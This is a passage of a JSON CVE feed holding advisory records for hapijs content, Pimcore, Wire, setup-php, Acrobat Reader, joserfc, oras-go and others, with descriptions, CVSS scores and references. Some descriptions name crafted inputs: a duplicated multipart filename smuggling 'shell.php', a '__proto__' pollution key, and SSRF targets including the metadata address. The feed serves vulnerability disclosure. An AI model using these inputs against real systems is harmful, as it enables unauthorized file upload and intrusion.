name=\"file\"; filename=\"safe.txt\"; filename=\"shell.php\". This issue is fixed in version 6.0.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"hapijs","product":"content","versions":[{"version":"< 6.0.2","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-436"}]}],"references":[{"url":"https://github.com/hapijs/content/commit/3850079550c191d25e3643dc82a6d61144db8c2f","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/content/security/advisories/GHSA-36hh-x5p5-jgc8","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-45260","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:16.857","lastModified":"2026-07-17T20:17:16.857","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Pimcore is an Open Source Data & Experience Management Platform. Prior to 11.5.17 (LTS) and 12.3.7, Pimcore's WebDAV asset endpoint exposes a MOVE operation through /asset/webdav{path} without an authentication plugin in bundles/CoreBundle/src/Controller/WebDavController.php, and models/Asset/WebDAV/Tree.php performs asset mutation and deletion through models/Asset.php before checking a current Pimcore user or the rename, delete, create, or publish permissions, allowing unauthorized asset deletion, moves, or overwrites. This issue is fixed in versions 11.5.17 (LTS) and 12.3.7."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"pimcore","product":"pimcore","versions":[{"version":"< 11.5.17","status":"affected"},{"version":">= 12.0.0, < 12.3.7","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.2}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/pimcore/pimcore/commit/9d7c77fd9b19fa011ce470de95d4438e65007d99","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/pull/19120","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/releases/tag/v12.3.7","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/security/advisories/GHSA-wc7j-g8wx-m2qx","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-45704","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:18.267","lastModified":"2026-07-17T20:17:18.267","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Pimcore is an Open Source Data & Experience Management Platform. Prior to 11.5.17 (LTS) and 12.3.6, CustomReports uses inconsistent authorization between the report listing endpoint and the report detail endpoint in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php and bundles/CustomReportsBundle/src/Tool/Config/Listing/Dao.php, allowing a low-privileged backend user with the reports permission to directly request an unshared report such as poc-secret-report by name and read report name, grouping information, display and icon metadata, data source configuration, column configuration, and sharing settings even when shareGlobally is false. This issue is fixed in versions 11.5.17 (LTS) and 12.3.6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"pimcore","product":"pimcore","versions":[{"version":"< 11.5.17","status":"affected"},{"version":">= 12.0.0, < 12.3.6","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/pimcore/pimcore/commit/1893ff1cd116e442b995ddf17e8c6e0aa372268e","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/pull/19099","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/releases/tag/v12.3.6","source":"security-advisories@github.com"},{"url":"https://github.com/pimcore/pimcore/security/advisories/GHSA-jwcc-gv4m-93x6","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-45799","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:18.393","lastModified":"2026-07-17T20:17:18.393","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Wire provides gRPC and protocol buffers for Android, Kotlin, Swift, and Java. Prior to 6.3.0 and 7.0.0-alpha03, ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup() in wire-runtime do not validate that a LENGTH_DELIMITED field length is non-negative before skip(), allowing a crafted protobuf varint encoding -128 as a signed Int to make skip(-128) move the internal position negative and make the next readByte() throw ArrayIndexOutOfBoundsException instead of the documented IOException or ProtocolException, which can crash services using ProtoAdapter.decode(byte[]) on untrusted payloads. This issue is fixed in versions 6.3.0 and 7.0.0-alpha03."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"square","product":"wire","versions":[{"version":"< 6.3.0","status":"affected"},{"version":">= 7.0.0-alpha01, < 7.0.0-alpha03","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-129"}]}],"references":[{"url":"https://github.com/square/wire/commit/47d5b0dba53935d5332cd41a80a353b3fc90e7b0","source":"security-advisories@github.com"},{"url":"https://github.com/square/wire/commit/e4e56fab38a547d9625f05c97f1d8f0bcc3a5773","source":"security-advisories@github.com"},{"url":"https://github.com/square/wire/pull/3595","source":"security-advisories@github.com"},{"url":"https://github.com/square/wire/pull/3597","source":"security-advisories@github.com"},{"url":"https://github.com/square/wire/releases/tag/6.3.0","source":"security-advisories@github.com"},{"url":"https://github.com/square/wire/releases/tag/7.0.0-alpha03","source":"security-advisories@github.com"},{"url":"https://github.com/square/wire/security/advisories/GHSA-7xpr-hc2w-34m9","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-46420","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:18.567","lastModified":"2026-07-17T20:17:18.567","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"setup-php is a GitHub action to set up PHP with extensions, php.ini configuration, coverage drivers, and tools. From 2.25.0 prior to 2.37.1, shivammathur/setup-php resolves the PHP version from repository-controlled files such as .php-version, composer.lock through platform-overrides.php, and composer.json through config.platform.php, and insufficiently constrains those values before incorporating them into generated shell or PowerShell setup scripts, allowing command injection on a GitHub Actions runner when workflows such as pull_request_target check out attacker-controlled contents before invoking setup-php. This issue is fixed in version 2.37.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"shivammathur","product":"setup-php","versions":[{"version":">= 2.25.0, < 2.37.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":5.6,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.2,"impactScore":3.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-78"}]}],"references":[{"url":"https://github.com/shivammathur/setup-php/commit/eeef37e059fb5368a5bc8ed8ce45ff54bd39b80b","source":"security-advisories@github.com"},{"url":"https://github.com/shivammathur/setup-php/releases/tag/2.37.1","source":"security-advisories@github.com"},{"url":"https://github.com/shivammathur/setup-php/security/advisories/GHSA-pqwm-q9pv-ph8r","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48373","sourceIdentifier":"psirt@adobe.com","published":"2026-07-17T20:17:21.290","lastModified":"2026-07-17T20:17:21.290","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Acrobat Reader","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"24.001.30365","versionType":"semver","status":"affected"},{"version":"0","lessThanOrEqual":"26.001.21651","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Primary","description":[{"lang":"en","value":"CWE-122"}]}],"references":[{"url":"https://helpx.adobe.com/security/products/acrobat/apsb26-63.html","source":"psirt@adobe.com"}]}},{"cve":{"id":"CVE-2026-48504","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:21.413","lastModified":"2026-07-17T20:17:21.413","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"OpenTelemetry Rust is the Rust OpenTelemetry implementation. In 0.32.0 and earlier, BaggagePropagator::extract_with_context in opentelemetry_sdk did not enforce W3C Baggage size limits before parsing an inbound baggage header, so a large attacker-controlled header could cause unnecessary CPU work and short-lived heap allocations while parsing entries later discarded by the SDK's baggage storage limits. Services that accept untrusted inbound propagation headers may experience increased per-request resource usage when processing oversized baggage headers. This issue is fixed in version 0.32.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"open-telemetry","product":"opentelemetry-rust","versions":[{"version":"< 0.32.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/open-telemetry/opentelemetry-rust/commit/a389ca6b3e416416bc8fc9b01cf6076b9182ed14","source":"security-advisories@github.com"},{"url":"https://github.com/open-telemetry/opentelemetry-rust/security/advisories/GHSA-w9wp-h8wv-79jx","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48819","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:21.553","lastModified":"2026-07-17T20:17:21.553","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Hey API is an ecosystem for turning API specifications into production-ready code. Prior to 0.97.3, dist/clients/core/params.ts ships a runtime template copied into generated SDKs as params.gen.ts, and buildClientParams writes unknown slot-prefixed keys such as $body_, $headers_, $path_, and $query_ directly to the corresponding slot, allowing $query___proto__ alongside a legitimate q field to set params.query through params[\"query\"][\"__proto__\"] = value, call Object.setPrototypeOf(params.query, value), and expose inherited attacker-controlled keys during for..in iteration. This issue is fixed in version 0.97.3."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"hey-api","product":"openapi-ts","versions":[{"version":"< 0.97.3","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":2.5}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-1321"}]}],"references":[{"url":"https://github.com/hey-api/hey-api/commit/023909137a15eff9c0263d3bcd116140076b214f","source":"security-advisories@github.com"},{"url":"https://github.com/hey-api/hey-api/commit/da321a1529eb3c90d2109da870f514b915a60169","source":"security-advisories@github.com"},{"url":"https://github.com/hey-api/hey-api/releases/tag/%40hey-api%2Fopenapi-ts%400.97.3","source":"security-advisories@github.com"},{"url":"https://github.com/hey-api/hey-api/security/advisories/GHSA-hhx9-57xq-r5rw","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48978","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:21.693","lastModified":"2026-07-17T20:17:21.693","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"oras-go is a Go library for managing OCI artifacts. Prior to 2.6.1, auth.Client follows the realm URL from a registry's WWW-Authenticate: Bearer challenge without validating the scheme or host, allowing a malicious or compromised registry to cause SSRF to internal networks such as http://169.254.169.254/, http://10.0.0.x/, and http://127.0.0.1/, or to downgrade a registry contacted over https:// to an http:// token endpoint in registry/remote/auth/client.go through Client.Do(), Client.fetchBearerToken(), fetchDistributionToken, and fetchOAuth2Token. This issue is fixed in version 2.6.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"oras-project","product":"oras-go","versions":[{"version":"< 2.6.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-319"},{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/oras-project/oras-go/commit/7a9f4b0b9558821b0422152ebe21ae56930fe764","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/releases/tag/v2.6.1","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/security/advisories/GHSA-xf85-363p-868w","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49284","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:21.830","lastModified":"2026-07-17T20:17:21.830","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"SimpleSAMLphp versions before 1.18.6 contain an information disclosure vulnerability. Prior to 2.4.7 and 2.5.2, SimpleSAMLphp's SAML SP ACS path does not enforce the IdP selected for an SP-initiated login when unsigned Response/InResponseTo is combined with a signed assertion lacking SubjectConfirmationData/InResponseTo, allowing a response issued by one trusted IdP to be bound to SP state created for another IdP and bypass flows that route users to a specific IdP, including deployments that set enable_unsolicited to false. This issue is fixed in versions 2.4.7 and 2.5.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"simplesamlphp","product":"simplesamlphp","versions":[{"version":"< 2.4.7","status":"affected"},{"version":">= 2.5.0-rc1, < 2.5.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.2}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-345"}]}],"references":[{"url":"https://github.com/simplesamlphp/simplesamlphp/releases/tag/v2.4.7","source":"security-advisories@github.com"},{"url":"https://github.com/simplesamlphp/simplesamlphp/releases/tag/v2.5.2","source":"security-advisories@github.com"},{"url":"https://github.com/simplesamlphp/simplesamlphp/security/advisories/GHSA-q8r6-xj3f-wrrm","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49834","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:21.963","lastModified":"2026-07-17T20:17:21.963","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"sigstore-go is a Go library for Sigstore signing and verification. Prior to 1.2.0, a verifier configured with WithTransparencyLog(N>1) or WithSignedCertificateTimestamps(N>1) counts verified witnesses per entry or per validation path rather than per log authority, allowing a single compromised transparency log or CT log to satisfy multi-log threshold requirements and defeat the multi-log policy. This issue is fixed in version 1.2.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"sigstore","product":"sigstore-go","versions":[{"version":"< 1.2.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:42:04.325650Z","id":"CVE-2026-49834","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-347"}]}],"references":[{"url":"https://github.com/sigstore/sigstore-go/commit/dbb07e62623edd5b175fb9dd5a41dcb85a159207","source":"security-advisories@github.com"},{"url":"https://github.com/sigstore/sigstore-go/pull/633","source":"security-advisories@github.com"},{"url":"https://github.com/sigstore/sigstore-go/releases/tag/v1.2.0","source":"security-advisories@github.com"},{"url":"https://github.com/sigstore/sigstore-go/security/advisories/GHSA-9vcr-p3rj-q5q6","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49852","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:23.270","lastModified":"2026-07-17T20:17:23.270","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. Prior to 1.6.8, joserfc.jwt.decode accepts attacker-forged HMAC-signed tokens when the caller-supplied verification key is the empty string or None, because HMACAlgorithm.sign and HMACAlgorithm.verify in src/joserfc/_rfc7518/jws_algs.py pass the output of OctKey.get_op_key(...) to hmac.new(...) and OctKey.import_key in src/joserfc/_rfc7518/oct_key.py only emits a SecurityWarning for keys shorter than 14 bytes without rejecting zero-length input. This issue is fixed in version 1.6.8."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"authlib","product":"joserfc","versions":[{"version":"< 1.6.8","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-287"},{"lang":"en","value":"CWE-326"},{"lang":"en","value":"CWE-1391"}]}],"references":[{"url":"https://github.com/authlib/joserfc/commit/86d00910b2b2d2d07503fee9b572906daefab7f1","source":"security-advisories@github.com"},{"url":"https://github.com/authlib/joserfc/releases/tag/1.6.8","source":"security-advisories@github.com"},{"url":"https://github.com/authlib/joserfc/security/advisories/GHSA-gg9x-qcx2-xmrh","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-4938","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:23.410","lastModified":"2026-07-17T20:17:23.410","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 and IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 could allow an attacker with read-only privileges to make unauthorized modifications and deployments outside of their assigned permissions."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Verify Identity Access","cpes":["cpe:2.3:a:ibm:verify_identity_access:11.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access:11.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access:11.0.2:*:*:*:*:*:*:*"],"versions":[{"version":"11.0","lessThanOrEqual":"11.0.2","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Security Verify Access","cpes":["cpe:2.3:a:ibm:security_verify_access:10.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access:10.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access:10.0.9.1:*:*:*:*:*:*:*"],"versions":[{"version":"10.0","lessThanOrEqual":"10.0.9.1","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Verify Identity Access Container","cpes":["cpe:2.3:a:ibm:verify_identity_access_container:11.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access_container:11.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access_container:11.0.2:*:*:*:*:*:*:*"],"versions":[{"version":"11.0","lessThanOrEqual":"11.0.2","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Security Verify Access 